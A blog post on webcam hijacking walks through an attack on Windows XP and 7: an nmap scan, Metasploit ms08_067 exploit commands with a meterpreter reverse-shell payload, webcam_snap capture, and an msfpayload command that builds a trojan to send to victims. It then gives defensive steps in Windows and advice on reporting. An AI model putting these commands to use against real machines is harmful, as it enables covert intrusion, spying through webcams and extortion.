This document will provide a base line for what you may see when and if your webcam is being attacked by an attacker on the internet. Within this blog posting we will also take a look at ways you can disable, or damage the driver so that you can assure you will not be in someones blackmail listing. This document covers Windows XP Professional but can also extend to Windows versions 7, 8 and above.

Introduction

It is becoming an attackers favorite. And, it's something that can easily be done. You can attack someones webcam in a number of ways, but within this example the issue is going to be discussed from an attackers standpoint and finally we will discuss some options that you can employ in order to protect yourself, and your family. This might save you a bit of an issue, and some cash in the process. More so, it may save your child from the embarrassment and psychological effects that may be present when an attack like this happens.

Before I begin writing this article, I must say that this came from an event that had taken place and had caused me an amount of grief with the wonderful idiots at the NYPD, and thus made me question what the practices for not only computer crime but reporting for children's welfare was when it came to the NYPD. An old business partner approached me with a matter that she needed some help with. It was concerning her 12 or 13 year old grand daughter at the time. To make a long story short, what ended up happening was some degenerate attacked the childs computer and had taken candid snapshots of her. Of course with my background in security and forensics I was called to help identify how the attack took place and possibly run an analysis on the DISK IMAGE regarding what information I needed in order to check the logs, etc. Mind you my investigative approach was only for the logs and assuring that a sound forensic image was procured for the grandmother. Nothing more.

Once I've began to get involved my first stop was to contact the FBI, then locale where the crime was committed. FBI couldn't get involved for various reasons, and of course the local PD in their town of incidence could not get involved because -- well, it was well over their heads. In the meantime the NYPD had gotten wind of the situation during another process and had completely misinterpreted the issue and was doing what they were to do best. Arrest anyone to meet a quota. The purpose of this document is not only a technological write-up but also how to go about the reporting process so you can avoid the headaches.

How the Attack Comes Together

The first attack in nearly all cases happen with a mixture of an insecure system or vulnerable box, and then an attacker driven by greed. It normally flows with attacking a box, finding some pictures (webcam, your saved photos, e-mail photos, etc.) and then extorting you for money "or else the images will be on facebook, twitter, etc." You know how this goes. So, what ends up happening the user, or users on the other end become fear stricken and have no choice to either fork over the money or watch their bare essentials go all over the internet. The psychological affects of this type of attack can have a long lasting impact on a person of any age. Especially if it's done to a child as in the case I had explained previously.

When an attacker scans a box, he or she will do the following:

From within the terminal on a linux box, we've run the following command: nmap -sS -PN -v 192.168.1.3 (note that the IP address must match the IP address of your host within your network, virtual machine, or remote host for this to work). Once this has been performed, figure 1.0 will demonstrate what information is returned from the nmap scan:

Scanning a system with nmap.

Considering that MSRPC DCOM would be patched, we've moved our sights to the following exploit: exploit/windows/smb/ms08_067_netapi, as the name implies, it's for netapi. The port that we are mainly concerned with targeting is the port of microsoft-ds, on port 445 (CIFS). Within metasploit we will enter the following (for the faint of heart see part II of the example):

search netapi use exploit/windows/smb/ms08_067_netapi search payloads reverse_tcp set PAYLOAD payload/windows/metrepreter/reverse_tcp Set RHOST REMOTE_IP_ADDRESS_HERE set LHOST LOCAL_IP_ADDRESS_HERE exploit

From this point forward, we can issue the next command. In this example below, we see that there is a webcam that is returned.

Listing installed web cams.

Next, the attacker can issue the following command: webcam_snap. Once the webcam_snap is executed you should see your web cam light up, just like it does when it's on and you're on skype. If you see this happen and you're not using any video editing software, skype or similar applications -- it should send you a clear indication that you are being attacked. To do a live analysis of your system you can use the link here: Windows Live Analysis but keep in mind each attack is different when concerning logs, and it has not been covered for this exploit. The forensic analysis is only pointing to where you need to look and certain things to look for. The picture below is a snap of my webcam pointing at my server 2008 book.

Snapshot from a remote web cam.

Almost Protection in Windows XP

So we've covered one of the methods by which an attacker may obtain an image from your computer -- but how do we actually defend against this type of attack? Well because we're doing this with windows XP with the exploit, we figured it would prudent to cover windows XP first and the windows 7.

If you right-click on "My computer" and click on "Properties." Click the "Hardware" tab, and select the button that says "Device Manager" In the device manager, if you click the + icon on the "Sound Video and Game Controllers" you will expose the driver for your webcam. You have two options for this segment. Disable, Delete, or reinstall the driver. In this case we will disable the driver, or if you'd like you can delete it. Disabling disallows access to it and is easier to manage if we want to use a program such as skype later on. The figure below demonstrates our web cam.

Web Cam Driver in Windows XP.

Now that the driver is disabled, you should move your way into msconfig, and locating within the "Startup" and or "Services" tab anything that is your web cam. In this segment, you want to uncheck them both and click on "Apply" and then click on "OK." Once that is finished you should reboot the computer. If we launch the attack again against the system, you will notice that -- well... It still works... WTH!? Why? Well windows XP is somehow loading the drivers needed. Although these steps should protect you subsequent re-visits to exploit the box, and or send it trojans (as you will see in other examples) have failed. Given such, they are somewhat effective within windows 7.

Hacking Windows 7

There are a few ways you can hack windows 7. One of the methods is webdav that is well patched by now, and the other is the metasploit trojan that we will discuss herein. In order to launch this type of attack against a windows 7 box, you first need to build yourself a trojan from metasploit. In order to do so, please follow the next set of instructions:

msfpayload windows/meterpreter/reverse_tcp LHOST=LOCAL_IP_ADDRESS_HERE LPORT=8686 x > /home/username/Desktop/trojan.exe exploit

Once you've run this option, you can then proceed to sending the "Trojan.exe" application to a victim that might not know that he or she is going to be attacked. Once they click on the exe file, you can then begin your attack. In any case some information will flood the scren and you will know that you are in the computer you are targeting. From here you simply issue the commands we've entered when we did the exploit against windows XP; webcam_list, and of course webcam_snap. This will get you what you want. A nice picture of your victim. Now, within windows 7 you can do a few things. And, from our testing we've found the following details:

1. Disabling the Driver
Does not prevent the system from being exposed to the attack.
2. Disabling the Software from Loading and Disabling Driver
During our tests if you disable the webcam software from startup the attack freezes. and a timeout error is presented. At which point the victim must remove and re-insert the camera (if external). When the camera is removed the session dies and is disconnected from msf. If you are successful in getting the system to reconnect the camera becomes unresponsive.
3. Only Disabling Webcam Software
Seems to work best. No need to disable the driver.

Disabling the Software in Windows 7

Click on start, and then enter msconfig. Once msconfig appears you might want to run as administrator, or click it to launch the program. If you cannot find the program please hold down the windows key and then hit the R key and release. You will see a dialog called "Run" appear. Once this dialog appears enter "msconfig" without quotations and press enter. Within msconfig, continue to startup and uncheck any webcam related software. Click on "Apply" and then "OK" and restart your computer.

Disable Webcam Software.

Reporting

In my experience it has come to my attention that if a situation like this does arise that you skip over the local police department, especially that of the NYPD. Should you know that a child's welfare has been put at risk and are reporting the issue and you're not the party who is causing the child harm it's best to go straight to the FBI. You can google your local field office and contact them to procure any information that you may need. Should they get involved, depending on the attack it is best to unplug the ethernet cable from the computer and make sure it stays on!

Police departments are not equipped in order to handle computer crime cases and will attempt (through my experience) to place full blame on you, and make you the suspect due to their lack of knowledge.